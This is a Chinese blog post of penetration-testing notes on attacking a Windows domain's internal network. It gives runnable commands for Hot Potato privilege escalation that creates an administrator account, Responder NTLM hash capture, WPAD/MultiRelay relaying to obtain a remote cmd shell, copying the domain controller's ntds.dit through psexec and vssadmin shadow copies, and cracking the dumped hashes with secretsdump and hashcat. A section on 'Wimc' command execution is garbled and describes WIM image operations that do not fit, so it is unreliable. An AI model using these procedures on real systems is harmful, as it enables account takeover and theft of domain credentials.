当前位置:   article > 正文

内网渗透-跨域环境渗透-2_内网渗透赛题跨域

内网渗透赛题跨域

目录

内网渗透-跨域环境渗透-2

热土豆提权

Wimc连接执行命令

Responder 密码抓取

WPAD提权

提取域控的NTDS hash文件


内网渗透-跨域环境渗透-2

热土豆提权
这个是提升本地权限的,不是提域控!


  1. 总结:
  2. Potato.exe -ip 需要提权的IP -disable exhaust true -cmd "C:\Windows\System32\cmd.exe /K net user potato 123.com /add &&net localgroup administrators potato /add"
  3. 调用exe执行程序,-ip后面加上需要提权的IP;-disable exhaust 后面改成 true ;-cmd 调用cmd.exe程序,然后创建一个potato用户,密码为 123.com ,并且加入到管理员组里面!
Wimc连接执行命令

  1. 1. **打开命令行终端**:打开命令提示符或 PowerShell 终端,以便执行命令。
  2. 2. **连接到 WIMC**:在命令行中输入以下命令来连接到 WIMC:
  3.   ```
  4.   wimc.exe /CONNECT /WimFilePath:<WIM文件路径>
  5.   ```
  6.   替换 `<WIM文件路径>` 为您想要连接的 WIM 文件的完整路径。
  7. 3. **执行命令**:一旦连接成功,您可以在 WIMC 终端中执行各种命令。例如,您可以运行以下命令之一:
  8.   - `APPLY`:将映像应用到指定目标。
  9.   - `RENAME`:重命名映像中的项目。
  10.   - `COMMIT`:将更改保存到映像中。
  11.   - `UNMOUNT`:卸载已挂载的映像。

Responder 密码抓取

  1. 总结:
  2. 1、首先,浏览器在正常情况下会存在自动检测代理的设置,我们只需要使用responder监听这个网口就行!
  3. 2、responder -I 网卡名称
  4. 3、得到加密的hash密文。如果是windows默认的登录密文,是以NTLM加密的格式!
  5. 4、利用hashcat破解即可!
  6. hashcat -a 0 -m 5600 hash.txt dic.txt --force


WPAD提权

  1. 总结:
  2. 1、WPAD提权就是在responder的基础上进行的!
  3. vi /usr/share/responder/Responder.conf
  4. 修改配置文件 把SMB和HTTP都改成OFF
  5. 2、修改配置文件
  6. cd /usr/share/responder/tools
  7. python RunFinger.py -i IP
  8. 在tools中利用检测脚本,来检测哪些可以进行攻击
  9. 3、在第一个终端上,开启responder: python Responder.py -l eth0
  10. 在第二个终端上,运行Multirelay.py脚本: python MultiRelay.py -t 可攻击的主机IP -U ALL
  11. 4、只要攻击目标任意登录网站,我们即可获取到对方的cmd命令窗口

提取域控的NTDS hash文件

  1. 总结:(自己带入IP)
  2. 1、psexec/accepteula 设置psexec接受模式
  3. net use\192.168.3.130\ipc$ "1234.com"/user:"cracer\administrator" : 与域控建立一个空链接
  4. 2、查看域控是否建立卷影副本,将文件保存到本地查看
  5. psexec \\192.168.3.130 -u "cracer\administrator" -p "1234.com" -h cmd /c"vssadmin list shadows
  6. >>\192.168.3.132\c$\test\out.txt"
  7. 3、如果没有,我们就手工建立一个
  8. psexec \\192.168.3.130 -u cracer\administrator -p "1234.com" -h cmd /c "vssadmin create shadow /for=c:
  9. >>192.168.3.132\c$\test\louts.txt"
  10. 4、将NTDS文件拷贝到本地服务器
  11. psexec \\192.168.3.130 -u "cracer\administrator" -p "1234.com" -h cmd /c "copy\\?\GLOBALROOT \Device\Harddisk\VolumeshadowCopy1\windows\ntds\ntds.dit \\192.168.3.132\c$\test\"
  12. 5、删除卷影副本
  13. vssadmin delete shadows /for=c:/quiet
  14. 如果执行psexec报错
  15. Psexec \\192.168.8.100 -u cracer\administrator -p "1234.com" -h cmd /c "vssadmin create shadow /for=c: >> \\192.168.8.135\test\out.txt" /accepteula
  16. 尝试一下命令
  17. psexec /accepteula \\192.168.8.100 -u cracer\administrator -p "1234.com" -h cmd /c "vssadmin create shadow /for=c: >>\\192.168.8.135\test\out.txt"
  18. 6、读取NTDS文件hash内容
  19. 使用impacket工具
  20. ./secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit -user-status local
  21. 7、hashcat暴力破解即可
  22. hashcat -a 0 -m 1000 win.hash dic.txt -o winpass.list
  23. -a 0 :表示字典爆破
  24. -m 1000 :加密类型是NTML类型
  25. win.hash : window hash密码
  26. dic.txt : 字典
  27. -o winpass.txt 表示将结果输出到 winpass.txt文件中
 
仅供参考

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读